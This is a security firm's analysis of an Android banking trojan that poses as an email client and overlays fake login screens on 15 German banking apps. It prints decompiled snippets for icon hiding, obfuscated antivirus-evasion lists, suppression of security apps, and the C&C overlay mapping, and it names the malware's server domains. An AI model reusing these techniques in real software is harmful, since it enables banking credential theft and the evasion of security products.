Banking Trojan Targets German Financial Institutions

This report summarizes a mobile malware attack recently discovered by Trustlook Labs. Based on the information we obtained, Trustlook can confirm that various financial institutions across the world have been targeted, with Germany being the most targeted country in the attack.

Trustlook Labs investigated the malware’s attack vectors as well as the communication between the compromised devices and their command-and-control (C&C) server infrastructure. The attack targets 15 financial institutions in Germany. Based on our findings, we expect that mobile users of other regional financial services institutions will face similar threats.

The malware is likely distributed through a link embedded in an email or text message, or from a phishing website. The user downloads an app and “sideloads” it since the app is not directly from the Google Play Store.

The malware masquerades as an Email client and comes with a corresponding icon.

image02

The app forces the user to grant device administrator access.

image04

The malware then calls setComponentEnabledSetting() to hide the icon:

  private void invoke_hideApp2()

  {

    getApplicationContext().getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);

  }

 

  public PendingIntent f()

  {

    Intent localIntent = new Intent(n);

    return PendingIntent.getBroadcast(getApplicationContext(), 0, localIntent, 0);

  }

   

The malware hides strings by inserting characters in a random location inside the string. For example:

public static final String[] d = { “c!o!m!.qiho!o.!s!ec!ur!i!t!y!”.replace(“!”, “”), “co!m.!an!tiv!i!r!u!s”.replace(“!”, “”), “co!m!.t!heg!old!e!ng!o!o!da!pp!s!.!ph!on!e!_c!l!e!aning!_v!iru!s_f!r!e!e!.c!l!ean!e!r.!b!oos!t!er!”.replace(“!”, “”), “c!om!.antiv!ir!us.!table!t!”.replace(“!”, “”), “c!om!.!n!qm!o!b!il!e.!an!t!i!v!i!r!u!s20!”.replace(“!”, “”), “co!m.km!s!.!f!r!ee”.replace(“!”, “”), “co!m!.!dr!w!e!b!”.replace(“!”, “”), “co!m!.!t!rus!t!l!o!ok!.!a!nt!i!v!i!r!u!s!”.replace(“!”, “”), “c!om!.!es!e!t.e!m!s2!.gp!”.replace(“!”, “”), “com!.e!set!.!e!m!s.!g!p!”.replace(“!”, “”), “c!om.s!y!ma!nte!c.mo!b!i!le!s!e!cur!it!y!”.replace(“!”, “”), “c!om.!d!u!ap!p!s.!a!n!t!i!vir!us”.replace(“!”, “”), “c!o!m.!p!ir!i!f!or!m!.!c!c!l!ea!ner!”.replace(“!”, “”), “c!o!m!.!c!l!ean!mast!e!r!.!m!guar!d”.replace(“!”, “”), “c!o!m.clea!n!m!ast!er.s!e!cu!ri!t!y”.replace(“!”, “”), “c!o!m!.!s!on!y!er!i!c!sso!n!.!m!t!p!.!ext!en!s!ion.f!ac!to!r!yr!es!et”.replace(“!”, “”), “com!.!a!n!hlt!.!ant!i!vi!ru!sp!r!o!”.replace(“!”, “”), “co!m.c!l!e!a!n!m!as!ter.!s!d!k”.replace(“!”, “”), “c!om!.!qi!ho!o!.!se!cu!rit!y.!l!i!te”.replace(“!”, “”), “o!e!m!.!a!nt!iv!i!r!us”.replace(“!”, “”), “c!om!.!ne!tqi!n!.an!ti!v!ir!u!s!”.replace(“!”, “”), “d!r!oi!d!d!u!d!es!.!b!es!t!.!an!i!tv!i!r!u!s!”.replace(“!”, “”), “c!om.b!i!t!d!ef!e!nd!e!r.!a!nt!iv!ir!u!s!”.replace(“!”, “”), “c!o!m.!dia!nx!ino!s!.!op!ti!m!iz!er!.d!upl!a!y!”.replace(“!”, “”), “c!o!m!.c!l!ea!nma!ster.!mg!ua!rd_x!8!”.replace(“!”, “”), “c!om!.w!o!mb!oi!dsy!st!e!m!s!.!an!t!i!v!i!ru!s.s!e!cu!r!i!ty.!a!n!d!r!oi!d”.replace(“!”, “”), “co!m.!nq!mob!il!e.a!nt!iv!ir!u!s!2!0!.!cl!a!rob!r!”.replace(“!”, “”), “c!o!m!.!r!e!f!e!r!p!l!i!s!h!.!V!iru!s!R!e!mo!v!al!F!o!r!A!ndr!o!i!d”.replace(“!”, “”), “c!o!m.!c!l!e!a!n!ma!s!t!er!.b!o!o!s!t!”.replace(“!”, “”), “co!m!.z!r!gi!u!.!a!nti!v!ir!u!s!”.replace(“!”, “”), “a!v!g!.!a!n!t!i!vi!r!us”.replace(“!”, “”) };

From the above string, the malware retrieves the process names of widely used mobile security products, including Trustlook Antivirus:

  • com.qihoo.security
  • com.antivirus
  • com.thegoldengoodapps.phone_cleaning_virus_free.cleaner.booster
  • com.antivirus.tablet
  • com.nqmobile.antivirus20
  • com.kms.free
  • com.drweb
  • com.trustlook.antivirus
  • com.eset.ems2.gp
  • com.eset.ems.gp
  • com.symantec.mobilesecurity
  • com.duapps.antivirus
  • com.piriform.ccleaner
  • com.cleanmaster.mguard
  • com.cleanmaster.security
  • com.sonyericsson.mtp.extension.factoryreset
  • com.anhlt.antiviruspro
  • com.cleanmaster.sdk
  • com.qihoo.security.lite
  • oem.antivirus
  • com.netqin.antivirus
  • droiddudes.best.anitvirus
  • com.bitdefender.antivirus
  • com.dianxinos.optimizer.duplay
  • com.cleanmaster.mguard_x8
  • com.womboidsystems.antivirus.security.android
  • com.nqmobile.antivirus20.clarobr
  • com.referplish.VirusRemovalForAndroid
  • com.cleanmaster.boost
  • com.zrgiu.antivirus
  • avg.antivirus

If any one of the above active processes is found, the malware immediately launches the home screen to suppress the process.

    List localList = com.jaredrummler.android.processes.a.a(paramContext);

    if ((e.g(paramContext)) && (!i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.a, localList, null)))

    {

      a();

      return;

    }

    if (com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length > 0) // list of security product strings

    {

      int i = 0;

      while (i < com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length)

      {

        if (i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d[i], localList, null)) // i.a(String arg2, List arg3, Context arg4) search the active process under “/proc”

        {

          i.b(paramContext); // Launch home screen

          return;

        }

        i += 1;

      }

}

[…]

  public static void b(Context paramContext)

  {

    Intent localIntent = new Intent(“android.intent.action.MAIN”);

    localIntent.addCategory(“android.intent.category.HOME”);

    localIntent.setFlags(268435456);

    paramContext.startActivity(localIntent);

  }

The malware sends out system information, and all communications are SSL encrypted. The following is an example of decrypted traffic:

image03

The malware then monitors the process related to the financial institutions. The process lists are taken from the following string:

public static final String b = “[{\”to\”: \”de.postbank.finanzassistent\”,\”body\”: \”%API_URL%%PARAM%17\”},{\”to\”: \”de.fiducia.smartphone.android.banking.vr\”,\”body\”: \”%API_URL%%PARAM%16\”},{\”to\”: \”mobile.santander.de\”,\”body\”: \”%API_URL%%PARAM%18\”},{\”to\”: \”de.adesso.mobile.android.gad\”,\”body\”: \”%API_URL%%PARAM%68\”},{\”to\”: \”com.starfinanz.smob.android.sfinanzstatus\”,\”body\”: \”%API_URL%%PARAM%11\”},{\”to\”: \”com.starfinanz.mobile.android.dkbpushtan\”,\”body\”: \”%API_URL%%PARAM%69\”},{\”to\”: \”com.isis_papyrus.raiffeisen_pay_eyewdg\”,\”body\”: \”%API_URL%%PARAM%10\”},{\”to\”: \”com.starfinanz.smob.android.sbanking\”,\”body\”: \”%API_URL%%PARAM%70\”},{\”to\”: \”de.dkb.portalapp\”,\”body\”: \”%API_URL%%PARAM%15\”},{\”to\”: \”com.ing.diba.mbbr2\”,\”body\”: \”%API_URL%%PARAM%9\”},{\”to\”: \”de.ing_diba.kontostand\”,\”body\”: \”%API_URL%%PARAM%67\”},{\”to\”: \”de.commerzbanking.mobil\”,\”body\”: \”%API_URL%%PARAM%13\”},{\”to\”: \”de.consorsbank\”,\”body\”: \”%API_URL%%PARAM%14\”},{\”to\”: \”com.db.mm.deutschebank\”,\”body\”: \”%API_URL%%PARAM%8\”},{\”to\”: \”de.comdirect.android\”,\”body\”: \”%API_URL%%PARAM%12\”}]”.replace(“%PARAM%”, “njs2/?m=”);

The affected banking apps are:

  • de.postbank.finanzassistent
  • de.fiducia.smartphone.android.banking.vr
  • mobile.santander.de
  • de.adesso.mobile.android.gad
  • com.starfinanz.smob.android.sfinanzstatus
  • com.starfinanz.mobile.android.dkbpushtan
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.starfinanz.smob.android.sbanking
  • de.dkb.portalapp
  • com.ing.diba.mbbr2
  • de.ing_diba.kontostand
  • de.commerzbanking.mobil
  • de.consorsbank
  • com.db.mm.deutschebank
  • de.comdirect.android

The malware then searches for the related active processes. Once found, the malware constructs the corresponding URL used to retrieve the web interface from the C&C server. During this time, the malware uses an AlarmManager to keep the screen and WiFi on:

  protected void onCreate(Bundle paramBundle)

  {

    super.onCreate(paramBundle);

    if (i.c(getApplicationContext())) {

      return;

    }

    setContentView(2130903065); // layout.activity_main

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.j(this, com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.b); // process string/URL list store into  JSON format

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.h(this, “”); // root_phone

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.d(this, false); //app_kill

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.c(this, false); //free_dialog

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.g(this, false);

    this.p = new a(this);

    Settings.System.putInt(getContentResolver(), “wifi_sleep_policy”, 2);

    if (MainService.c == null)

    {

      MainService.c = ((PowerManager)getSystemService(“power”)).newWakeLock(1, MainService.b);

      MainService.c.acquire();

      MainService.d = ((WifiManager)getSystemService(“wifi”)).createWifiLock(1, b.aP);

      if (!MainService.d.isHeld()) {

        MainService.d.acquire();

      }

    }

Once the user starts the banking app, the malware contacts its C&C server to receive data used to create and activate another WebView and entice the user to enter banking credentials. For example, if the user opens the banking app “mobile.santander.de”, the malware retrieves the data by issuing the following request:

image06

The following is the comparison of the real banking interface and the fake one:

 image05   image01

The collected credentials will be sent to the same C&C server. The malware can accept the commands from the server to receive and send SMS messages. The malware can intercept SMS and can steal your two-factor authentication PIN to complete a transaction without you realizing it.

Currently, the malware uses three servers:

  • polo777555lolo.at
  • polo569noso.at
  • wahamer8lol77j.at

The domains are registered by “Koste Karima” in Merdzavan, a village in the Armavir Province of Armenia, the current IP is located in Germany:

image00

The malware calls getNetworkCountryIso()  and getSimCountryIso () to get the device and SIM card country code. It stops running if any one of the following country codes is found:

  • ru
  • rus
  • kz
  • ua
  • by
  • az
  • am
  • kg
  • md
  • tj
  • tm
  • uz
  • us

Summary
The attack is launched by cyber criminals driven by financial incentives. It scams people into giving up their banking login credentials and other personal data by displaying overlays that look nearly identical to banking apps’ login pages. Its malicious behavior is spreading to additional countries, expanding its footprint at a rapid pace. But with deep knowledge of the malware behavior, Trustlook’s anti-threat platform can effectively protect our users against invasion.

Leave a Reply


− one = 4